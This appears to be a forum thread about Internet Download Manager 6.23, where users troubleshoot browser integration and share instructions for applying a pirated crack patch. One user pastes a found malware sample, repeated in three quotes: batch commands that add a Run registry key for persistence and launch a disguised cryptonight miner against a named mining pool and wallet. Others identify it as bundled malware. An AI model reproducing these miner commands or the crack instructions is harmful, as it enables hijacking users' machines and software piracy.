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Internet Download Manager 6.23 Build 10


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How to fix IDM toolbar not showing in youtube in chrome ?

Several days ago still work

:think: 1. is "use advanced browser intergration" ticked and with "google chrome" ticked in yer idm - downloads menu - options - general

2. check in google chome chrome://extensions/ and see if the "idm intergration module 6.23.10" is there and enabled

3. force idm extension into chrome bring up chrome://extensions/ in chrome and use windows explorer to navigate to IDM'S folder like eg.

C:\Program Files (x86)\Internet Download Manager

and find IDMGCExt.crx and drag that file into chrome extensions

Screenshots and more info on this at idm website

if still no luck maybe the video format in youtube is a unknown

if thats the case you could try using these other ways than using idm

google chrome extension "

tampermonkey" with

1. "Youtube Center" userscript installed (Original Userscript or Developer Userscript, i used this alot and i find now that download button not always shown with certain videos on youtube.)

but personally i use

2."SaveFrom.net helper" The userscript (Best youtube downloader ive worked with)

either userscripts installed, in youtube you'll have a download button under the video and other video format options

good luck. ;)

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:think: good luck. ;)

Thank you, I did all but not working for all video links

Firefox works well

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showing virus again that's why I never use REiS patch

every update contains virus

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showing virus again that's why I never use REiS patch

every update contains virus

Why do you know it is a virus ?

You should use a more intelligent Antivirus, such as ESET :)

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showing virus again that's why I never use REiS patch

every update contains virus

First learn what a "false positive antivirus detection" means.

Second don't use patches that you think are infected

because you are not forced to do it.

You have many options :)

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showing virus again that's why I never use REiS patch

every update contains virus

You can always use the firewall method, isn't it?

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Internet.Download.Manager.v6.x.x.Update.8.patch-REiS [Only the patch]


Hello Ghost,

Does this work on the 6.21 version? I am patching that version and I have put the patch in the IDM folder on drive D: . The patch fails because it is looking the IDMan.exe on Drive C:. Is there a way to select the location of the IDMan.exe file?


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or maybe you can create your own patch without being nuked by your av.

i guess you could try this, but if heuristic's pick it up the same way as how the other patch inner workings it will flag just the same dont u think. :think:

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Internet.Download.Manager.v6.x.x.Update.8.patch-REiS [Only the patch]


Hello Ghost,

Does this work on the 6.21 version? I am patching that version and I have put the patch in the IDM folder on drive D: . The patch fails because it is looking the IDMan.exe on Drive C:. Is there a way to select the location of the IDMan.exe file?


copy the patch to ur IDM installtion folder and then apply!!

That should help u out


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copy the patch to ur IDM installtion folder and then apply!!

That should help u out



This is what I did, but didn't work out. The folder is on drive D. I will try with the 6.23 version and see.

UPDATE: Installed version 6.23.10. Placed in IDM folder in Drive D: and same problem.

Is there any working patch for this version which allows users to select IDMan.exe for patching?


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Newer Ghost0507's IDM patches only work if you install IDM in the default folder (ie in C:).

For any other place there is a workaround...

1. Create C:\Program Files (x86)\Internet Download Manager folder;

2. Copy "IDMan.exe" and Ghost0507's IDM patch and run it as Administrator;

3. Copy patched "IDMan.exe" to D:\Program Files (x86)\Internet Download Manager;

4. Delete C:\Program Files (x86)\Internet Download Manager folder.

I hope this will help you...

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Newer Ghost0507's IDM patches only work if you install IDM in the default folder (ie in C:).

For any other place there is a workaround...

1. Create C:\Program Files (x86)\Internet Download Manager folder;

2. Copy "IDMan.exe" and Ghost0507's IDM patch and run it as Administrator;

3. Copy patched "IDMan.exe" to D:\Program Files (x86)\Internet Download Manager;

4. Delete C:\Program Files (x86)\Internet Download Manager folder.

I hope this will help you...

I have not thought about this at all.. Brilliant. Thank you.


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do not no if u guys are a adguard user but if yes

it seems sometime idman it leaks from C:\users\pc user\appdata\roaming\adobe\flash player\wincache\idman.exe


i do not use internet-download-manager

but i seen this in appdata\roaming\adobe\flash player\wincache\idman.exe

i say this as i never used internet-download-manager but adguard do it may help or not ?

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idman.exe in that folder???

maybe it's malware...mining


if it is its from adguard ?

this is whats inside the folder

it have a cmd

@echo off

%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\WinCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\WinCache\IDMan.bat\"" /f

start /b /normal "a" "%appdata%\Adobe\Flash Player\WinCache\IDMan.exe" -a cryptonight -o stratum+tcp://pool.cryptoescrow.eu:443 -u 49WdqGrQGKyfxjktN2UVKzBQhLrYcMNzqGdLBfKfsmm9KmtQbGETgKQRGRMkCUzXXM7cj6x9ZADQdhYDprjqkFU9Uvt3nZ1 -p x

and a vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

and a

Internet Download Manager (IDM) exe

i comment as i never used this program but firewall says its on my pc ?


look that the date i never installed this program or used it its from adguard i think i use shadowmode so i no whats on my pc ?

same as this to

C:\Users\PC User\AppData\Roaming

i see wYPbydp.png?1

its all adguard

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Internet.Download.Manager.v6.x.x.Update.8.patch-REiS [Only the patch]



Thanks for your efforts until now to make Crack for Internet Download Manager. I really love your crack. Only yours the best. Thanks. Keep up the good work. Thanks. God Bless You.

Please read this post regarding 'Thanks' posts and their replacement

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idman.exe in that folder???

maybe it's malware...mining


if it is its from adguard ?

this is whats inside the folder

it have a cmd

@echo off

%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\WinCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\WinCache\IDMan.bat\"" /f

start /b /normal "a" "%appdata%\Adobe\Flash Player\WinCache\IDMan.exe" -a cryptonight -o stratum+tcp://pool.cryptoescrow.eu:443 -u 49WdqGrQGKyfxjktN2UVKzBQhLrYcMNzqGdLBfKfsmm9KmtQbGETgKQRGRMkCUzXXM7cj6x9ZADQdhYDprjqkFU9Uvt3nZ1 -p x

and a vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

and a

Internet Download Manager (IDM) exe

i comment as i never used this program but firewall says its on my pc ?


look that the date i never installed this program or used it its from adguard i think i use shadowmode so i no whats on my pc ?

same as this to

C:\Users\PC User\AppData\Roaming

i see wYPbydp.png?1

its all adguard

it looks like was binded malware to some app installation file and looks like now running on the system using hardware resource for cryptocurrency mining.

similar example where malware was binded to WYSIWYGPortable_9.4_Multilingual.paf.exe

and also similar date, when was added to virus database by dr.web.


you can check with sysinternals autoruns if you have some unwanted autorun instances

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idman.exe in that folder???

maybe it's malware...mining


if it is its from adguard ?

this is whats inside the folder

it have a cmd

@echo off

%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\WinCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\WinCache\IDMan.bat\"" /f

start /b /normal "a" "%appdata%\Adobe\Flash Player\WinCache\IDMan.exe" -a cryptonight -o stratum+tcp://pool.cryptoescrow.eu:443 -u 49WdqGrQGKyfxjktN2UVKzBQhLrYcMNzqGdLBfKfsmm9KmtQbGETgKQRGRMkCUzXXM7cj6x9ZADQdhYDprjqkFU9Uvt3nZ1 -p x

and a vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

and a

Internet Download Manager (IDM) exe

i comment as i never used this program but firewall says its on my pc ?


look that the date i never installed this program or used it its from adguard i think i use shadowmode so i no whats on my pc ?

same as this to

C:\Users\PC User\AppData\Roaming

i see wYPbydp.png?1

its all adguard

it looks like was binded malware to some app installation file and looks like now running on the system using hardware resource for cryptocurrency mining.

similar example where malware was binded to WYSIWYGPortable_9.4_Multilingual.paf.exe

and also similar date, when was added to virus database by dr.web.


you can check with sysinternals autoruns if you have some unwanted autorun instances

Kaspersky Internet Security think its ok

and hit man pro and malwarebytes pro ?

i posted this as its not somethink i wood of installed i wos thinking its to do with adguard but i may be wrong if its a virus do not do one thing from what i no ?

ill stop commenting now as this topic about internet-download-manager ;)

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holy crap, I can't remember seeing so many replies for an IDM release...ever!

is it well on its way to becoming the next total uninstall? :troll:

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